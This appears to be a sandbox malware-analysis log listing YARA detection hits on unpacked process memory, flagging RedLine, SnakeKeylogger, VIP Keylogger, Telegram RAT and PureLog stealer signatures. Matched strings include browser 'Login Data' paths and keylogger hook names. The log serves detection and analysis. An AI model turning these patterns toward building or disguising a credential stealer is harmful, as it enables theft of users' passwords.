15.1.npratlsN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
15.2.npratlsN.pif.304b0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.npratlsN.pif.304b0000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.npratlsN.pif.304b0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.npratlsN.pif.304b0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.npratlsN.pif.304b0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
15.2.npratlsN.pif.304b0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.npratlsN.pif.304b0000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.npratlsN.pif.304b0000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.npratlsN.pif.304b0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.npratlsN.pif.304b0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.npratlsN.pif.304b0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
15.2.npratlsN.pif.304b0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
15.2.npratlsN.pif.304b0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
15.2.npratlsN.pif.304b0000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
15.2.npratlsN.pif.304b0000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
15.2.npratlsN.pif.2d63a8ee.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.npratlsN.pif.2d63a8ee.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.npratlsN.pif.2d63a8ee.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.npratlsN.pif.2d63a8ee.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.npratlsN.pif.2d63a8ee.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.npratlsN.pif.2d63a8ee.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
15.2.npratlsN.pif.2d63a8ee.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
15.2.npratlsN.pif.2d63a8ee.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
15.2.npratlsN.pif.2d639a06.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.npratlsN.pif.2d639a06.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.npratlsN.pif.2d639a06.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.npratlsN.pif.2d639a06.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.npratlsN.pif.2d639a06.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.npratlsN.pif.2d639a06.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
15.2.npratlsN.pif.2d639a06.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
15.2.npratlsN.pif.2d639a06.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
17.2.npratlsN.pif.2aa40000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.npratlsN.pif.2aa40000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.npratlsN.pif.2aa40000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.npratlsN.pif.2aa40000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.1.npratlsN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
17.2.npratlsN.pif.2aa40000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d7d9:$a1: get_encryptedPassword 0x3d7ad:$a2: get_encryptedUsername 0x3d871:$a3: get_timePasswordChanged 0x3d789:$a4: get_passwordField 0x3d7ef:$a5: set_encryptedPassword 0x3d5bc:$a7: get_logins 0x38c37:$a10: KeyLoggerEventArgs 0x38c06:$a11: KeyLoggerEventArgsEventHandler 0x3d690:$a13: _encryptedPassword
17.2.npratlsN.pif.2aa40000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48908:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47fab:$a3: \Google\Chrome\User Data\Default\Login Data 0x48208:$a4: \Orbitum\User Data\Default\Login Data 0x48be7:$a5: \Kometa\User Data\Default\Login Data
17.2.npratlsN.pif.2aa40000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b38c:$s1: UnHook 0x3b328:$s2: SetHook 0x3b361:$s3: CallNextHook 0x3b2f0:$s4: _hook
13.2.npratlsN.pif.1efb0000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.npratlsN.pif.1efb0000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
13.2.npratlsN.pif.1efb0000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.npratlsN.pif.1efb0000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.npratlsN.pif.1efb0000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.npratlsN.pif.1efb0000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
13.2.npratlsN.pif.1efb0000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
13.2.npratlsN.pif.1efb0000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
17.2.npratlsN.pif.2b0c0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.npratlsN.pif.2b0c0000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.npratlsN.pif.2b0c0000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.npratlsN.pif.2b0c0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.npratlsN.pif.2b0c0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.npratlsN.pif.2b0c0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
17.2.npratlsN.pif.2b0c0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
17.2.npratlsN.pif.2b0c0000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
14.2.Nsltarpn.PIF.20f567a8.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x38cb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x39330:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
17.2.npratlsN.pif.28129a06.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.npratlsN.pif.28129a06.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.npratlsN.pif.28129a06.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.npratlsN.pif.28129a06.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.npratlsN.pif.28129a06.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.npratlsN.pif.2fd20ee8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.npratlsN.pif.2fd20ee8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.npratlsN.pif.2fd20ee8.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.npratlsN.pif.2fd20ee8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.npratlsN.pif.2fd20ee8.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.npratlsN.pif.2d639a06.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.npratlsN.pif.2d639a06.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.npratlsN.pif.2d639a06.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.npratlsN.pif.2d639a06.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.npratlsN.pif.2fd20ee8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
17.2.npratlsN.pif.28129a06.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
17.2.npratlsN.pif.28129a06.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
15.2.npratlsN.pif.2fd20ee8.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
15.2.npratlsN.pif.2d639a06.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d7d9:$a1: get_encryptedPassword 0x3d7ad:$a2: get_encryptedUsername 0x3d871:$a3: get_timePasswordChanged 0x3d789:$a4: get_passwordField 0x3d7ef:$a5: set_encryptedPassword 0x3d5bc:$a7: get_logins 0x38c37:$a10: KeyLoggerEventArgs 0x38c06:$a11: KeyLoggerEventArgsEventHandler 0x3d690:$a13: _encryptedPassword
17.2.npratlsN.pif.28129a06.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
15.2.npratlsN.pif.2d639a06.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48908:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47fab:$a3: \Google\Chrome\User Data\Default\Login Data 0x48208:$a4: \Orbitum\User Data\Default\Login Data 0x48be7:$a5: \Kometa\User Data\Default\Login Data
15.2.npratlsN.pif.2fd20ee8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
15.2.npratlsN.pif.2d639a06.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b38c:$s1: UnHook 0x3b328:$s2: SetHook 0x3b361:$s3: CallNextHook 0x3b2f0:$s4: _hook
13.2.npratlsN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
17.2.npratlsN.pif.2aa40000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.npratlsN.pif.2aa40000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.npratlsN.pif.2aa40000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.npratlsN.pif.2aa40000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.npratlsN.pif.2aa40000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.npratlsN.pif.2aa40000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
17.2.npratlsN.pif.2aa40000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
17.2.npratlsN.pif.2aa40000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
7.2.brightness.exe.218933d8.10.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
13.2.npratlsN.pif.1efb0ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.npratlsN.pif.1efb0ee8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
13.2.npratlsN.pif.1efb0ee8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.npratlsN.pif.1efb0ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.npratlsN.pif.1efb0ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.npratlsN.pif.1efb0ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
13.2.npratlsN.pif.1efb0ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
13.2.npratlsN.pif.1efb0ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
13.2.npratlsN.pif.1efb0000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.1.npratlsN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
17.2.npratlsN.pif.2aa40ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.npratlsN.pif.2aa40ee8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.npratlsN.pif.2aa40ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.npratlsN.pif.2aa40ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.npratlsN.pif.2aa40ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
17.2.npratlsN.pif.28129a06.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.3.npratlsN.pif.2b88cb18.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.3.npratlsN.pif.2b88cb18.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.3.npratlsN.pif.2b88cb18.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.3.npratlsN.pif.2b88cb18.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.3.npratlsN.pif.2b88cb18.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
